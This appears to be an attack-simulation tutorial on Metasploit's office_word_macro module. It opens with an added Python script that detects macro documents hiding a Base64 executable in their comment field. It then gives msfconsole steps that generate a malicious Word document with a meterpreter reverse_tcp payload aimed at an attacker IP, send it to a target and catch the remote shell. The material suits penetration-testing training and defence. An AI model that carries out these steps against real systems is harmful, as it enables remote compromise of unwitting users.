Attack Simulation: Malicious Office Document (Metasploit)


This module generates a macro-enabled Microsoft Office Word document (docm). It does not target a specific CVE or vulnerability; instead it abuses a legitimate Office feature (macros), which nonetheless remains a popular social-engineering technique, for example in ransomware campaigns.

By default, the module uses a built-in Office document (docx) as the template. It injects the Base64-encoded payload into the document's comments field; the macro decodes it back and executes it as a Windows executable when the Office document is opened.
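Because the technique described above leaves two static artefacts in the file (a VBA project part and an oversized Base64 blob in the document comment), a defender can triage a suspicious document without opening it in Word. The following script is an added example written for this page, not code from the Metasploit module: it assumes the OOXML layout in which the "Comments" property is stored as dc:description in docProps/core.xml and the macro lives in word/vbaProject.bin, and it builds its own constructed sample containers (with a placeholder "MZ" header rather than any real executable) so it runs offline.

```python
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML namespaces: the Word "Comments" property is stored in docProps/core.xml
# as dc:description (assumption about the package layout, not taken from the page).
DC_NS = "http://purl.org/dc/elements/1.1/"
CP_NS = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def fake_payload_comment(size: int = 200) -> str:
    """Constructed stand-in for the injected comment: Base64 of bytes that merely
    start with the 'MZ' magic of a PE file. It is NOT an executable."""
    return base64.b64encode(b"MZ" + b"\x00" * size).decode()


def build_sample(has_macro: bool, comment: str) -> bytes:
    """Build a minimal, constructed OOXML container in memory for testing the
    inspector. Real .docm files carry many more parts; only the ones the check
    reads are included here."""
    core_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<cp:coreProperties xmlns:cp="{CP_NS}" xmlns:dc="{DC_NS}">'
        "<dc:title>Quarterly report</dc:title>"
        f"<dc:description>{comment}</dc:description>"
        "</cp:coreProperties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("docProps/core.xml", core_xml)
        z.writestr("word/document.xml", "<w:document/>")
        if has_macro:
            # Placeholder bytes: a real vbaProject.bin is an OLE compound file.
            z.writestr("word/vbaProject.bin", b"\x00" * 64)
    return buf.getvalue()


def inspect_office_file(data: bytes) -> dict:
    """Static triage of an OOXML document: does it carry a VBA project, and does
    the document comment decode from Base64 into something that looks like a PE?"""
    findings = {
        "has_vba": False,
        "comment_len": 0,
        "comment_is_b64": False,
        "decoded_looks_like_pe": False,
    }
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        findings["has_vba"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        if "docProps/core.xml" in names:
            root = ET.fromstring(z.read("docProps/core.xml"))
            desc = root.find(f"{{{DC_NS}}}description")
            comment = (desc.text or "") if desc is not None else ""
            findings["comment_len"] = len(comment)
            compact = re.sub(r"\s+", "", comment)
            if compact and B64_RE.fullmatch(compact):
                try:
                    blob = base64.b64decode(compact, validate=True)
                except ValueError:  # binascii.Error is a ValueError
                    blob = b""
                if blob:
                    findings["comment_is_b64"] = True
                    findings["decoded_looks_like_pe"] = blob[:2] == b"MZ"
    # A macro plus an executable hidden in metadata is the combination described above.
    findings["suspicious"] = findings["has_vba"] and findings["decoded_looks_like_pe"]
    return findings


if __name__ == "__main__":
    for label, sample in (
        ("suspicious", build_sample(True, fake_payload_comment())),
        ("benign", build_sample(False, "Reviewed by finance, final version")),
    ):
        print(label, inspect_office_file(sample))
```

The check deliberately requires both indicators before flagging a file: a VBA project alone is common in legitimate templates, and a Base64 comment alone may be a false positive, but the two together match the pattern this module produces. In a mail gateway or sandbox pipeline the same logic can be run over every attachment before it reaches a user.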

Step 1: Start up the postgresql service and enter the Metasploit command line:

[email protected]:~# service postgresql start
[email protected]:~# msfconsole -q
msf >

Step 2: Select the Office_Word_Macro exploit:

msf > use exploit/multi/fileformat/office_word_macro
msf exploit(office_word_macro) >

Step 3: Select a payload to use:

There are two popular types of shells: bind and reverse. A bind shell is the kind that opens up a new service on the target machine, and requires the attacker to connect to it in order to get a session.

A reverse shell (also known as a connect-back) is the exact opposite: the attacker first sets up a listener on their own machine, the target machine acts as a client connecting to that listener, and the attacker then receives the shell.

msf exploit(office_word_macro) > set payload windows/meterpreter/reverse_tcp

Options now need to be set so that the connection can be made back to the attacking system. Set the following two options:

msf exploit(office_word_macro) > set LHOST 192.168.0.10 (attacker IP)
msf exploit(office_word_macro) > set LPORT 443

Step 4: Execute the exploit:

msf exploit(office_word_macro) > exploit

You should now see progress in the Metasploit console, including the location where it has saved the malicious Word document. This file now needs to be transferred to the target machine.

Step 5: Start listening for the reverse TCP connection:

msf exploit(office_word_macro) > use exploit/multi/handler
msf exploit(multi/handler) > set LPORT 443
msf exploit(multi/handler) > run

This will now start listening for incoming connections on port 443. Once the document has executed successfully on the target machine, you will see an active session, and the exploit is complete.
